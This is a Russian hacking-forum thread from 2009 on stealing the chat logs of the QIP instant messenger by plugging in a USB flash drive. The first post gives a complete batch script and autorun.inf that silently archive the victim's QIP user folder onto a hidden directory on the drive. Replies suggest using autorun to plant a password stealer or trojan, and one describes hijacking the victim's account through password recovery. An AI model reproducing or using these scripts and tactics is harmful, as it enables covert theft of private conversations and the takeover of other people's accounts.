ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > ICQ
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Как с помощью USB Flash украсть логи QIP ?
  #1  
Старый 26.03.2009, 15:10
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332

Репутация: 1196


Отправить сообщение для L I G A с помощью ICQ
По умолчанию Как с помощью USB Flash украсть логи QIP ?



Что для этого нужно?

1 Создать файл zzz.bat с следующим текстом


@Echo off
c:
chdir C:\Program Files\QIP\Users
g:\rar.exe a -r users > nul
copy users.rar g:\123 > nul
del users.rar > nul



где
@Echo off.......скрывает визуальный процес копирования
C:\Program Files\QIP\Users.......папка которую нада потянуть
g:\rar.exe a -r users > nul.......запуск rar для ускорения копирования
copy users.rar g:\123 > nul.......адрес куда тянем
del users.rar > nul.......удаляет созданый архив

если буква флеш диска не извесна можна нарисовать несколько вариантов

@Echo off
c:
chdir C:\Program Files\QIP\Users
e:\rar.exe a -r users > nul
copy users.rar e:\123 > nul
g:\rar.exe a -r users > nul
copy users.rar g:\123 > nul
h:\rar.exe a -r users > nul
copy users.rar h:\123 > nul
del users.rar > nul


2 Создаем файл autorun.inf с текстом

[autorun]
ShellExeCute="zzz.bat"


3 Копируем rar.exe (1файлик а не всю папку) из папки Program Files\WinRAR


4 Создаем папку с названием 123


5 Поместить это все 4 файла в корень флешки и сделать скрытыми.


PS: Эфективно ворует мелкие файлы потому как это почти не заметно происходит.
А вот с большыми врятли получится , при архивировании слишком уж долго висит консоль.
Буду рад если кому пригодится


источник:http://qiq.ru/26/03/2009/information/116842/kak_s_pomoschju_usb_flash_ukrast_logi_qip.html

PS:По моему интересный способ.


================================================== ===========
Для тех у кого путь логов теперь тут C:\Documents and Settings\Admin\ApplicationData\QIP\Profiles:



@Echo off
c:
chdir C:\Documents and Settings\Admin\ApplicationData\QIP\Profiles
g:\rar.exe a -r users > nul
copy Profiles.rar g:\123 > nul
del Profiles.rar > nul


видео

Последний раз редактировалось L I G A; 28.03.2009 в 16:11..
 
Ответить с цитированием

  #2  
Старый 26.03.2009, 17:31
Dr.Gonzo
Познающий
Регистрация: 26.02.2009
Сообщений: 34
Провел на форуме:
276020

Репутация: 18
По умолчанию

Лучше автораном запустить какую-нибудь прогу, ворующую пароли (помню были такие, которые через командную строку работали и сохраняли все пассы в файл) или, уж что там мелочиться, троян сразу.
Есть один досадный недочет, который опытный пользователь сразу обнаружит: по клику на диске запустится бат файл, но сам диск не откроется, хоть ты закликайся.
Ну и еще одно но - пользователи TotalCommander'a пролетают...
 
Ответить с цитированием

  #3  
Старый 26.03.2009, 19:16
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332

Репутация: 1196


Отправить сообщение для L I G A с помощью ICQ
По умолчанию

Цитата:
Сообщение от Dr.Gonzo  
или, уж что там мелочиться, троян сразу.
Антивирус ругаться начнет.
 
Ответить с цитированием

  #4  
Старый 26.03.2009, 19:32
HellXi
Познающий
Регистрация: 18.11.2008
Сообщений: 98
Провел на форуме:
1543613

Репутация: 22
По умолчанию

баяяян !! низнаю какой давности....
и что ты этим добьёшься ?! ровным щётом НИЧЕГО, так как логи как правило зашифрованы
и это кстатии для 2005 кипа... Infium держит логи в другом месте

Последний раз редактировалось HellXi; 26.03.2009 в 19:39..
 
Ответить с цитированием

  #5  
Старый 26.03.2009, 20:03
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332

Репутация: 1196


Отправить сообщение для L I G A с помощью ICQ
По умолчанию

Цитата:
Сообщение от HellXi  
баяяян !! низнаю какой давности....
и что ты этим добьёшься ?! ровным щётом НИЧЕГО, так как логи как правило зашифрованы
и это кстатии для 2005 кипа... Infium держит логи в другом месте
стащю папку юзверс себе на машину ,и зайду в квип через его учетку,единственное что я не смогу - узнать пасс,в файле config.ini потому что квип постоянно меняет алгоритм шифрования.Но его можно узнать зайдя через эту учетку и ввести в данные свой email адрес, а потом воспользоваться системой напоминания пароля на соответствующих официальных сайтах icq или aim.

Последний раз редактировалось L I G A; 26.03.2009 в 21:02..
 
Ответить с цитированием

  #6  
Старый 26.03.2009, 20:10
LAGOX
Познающий
Регистрация: 14.02.2009
Сообщений: 31
Провел на форуме:
73281

Репутация: 5
По умолчанию

зачем изврат, если есть доступ к компу, идешь и воруешь логи в наглую, желательно без палева
 
Ответить с цитированием

  #7  
Старый 26.03.2009, 21:55
Fooog
Постоянный
Регистрация: 19.09.2008
Сообщений: 511
Провел на форуме:
1866685

Репутация: 340


Отправить сообщение для Fooog с помощью ICQ Отправить сообщение для Fooog с помощью AIM Отправить сообщение для Fooog с помощью Yahoo
По умолчанию

ТС! Это действительно было на ачате! Кажется не в разделе аси а в статьях (точно я не помню). Ссылку я сейчс на тему искать не буду... но если хочешь то найду
 
Ответить с цитированием

  #8  
Старый 26.03.2009, 22:08
Sn@k3
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
Провел на форуме:
5151669

Репутация: 1198


Отправить сообщение для Sn@k3 с помощью ICQ
По умолчанию

путь логов теперь тут
C:\Documents and Settings\Admin\Application Data\QIP\Profiles
 
Ответить с цитированием

  #9  
Старый 28.03.2009, 16:13
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332

Репутация: 1196


Отправить сообщение для L I G A с помощью ICQ
По умолчанию

из-за частых вопросов снял видео.
 
Ответить с цитированием

  #10  
Старый 28.03.2009, 16:29
Roston
Постоянный
Регистрация: 31.07.2008
Сообщений: 370
Провел на форуме:
2866942

Репутация: 350
Отправить сообщение для Roston с помощью ICQ
По умолчанию

согласен... бантик самое лучшее средство... я так хистори с асекю тырю.... пишеш 5 строк... зато доволен во всю=)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Как стать хакером! foreva Болталка 19 12.12.2007 00:12
Установка Windoze глазами линуксоида (100% факты) nerezus Болталка 47 16.10.2005 15:06
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ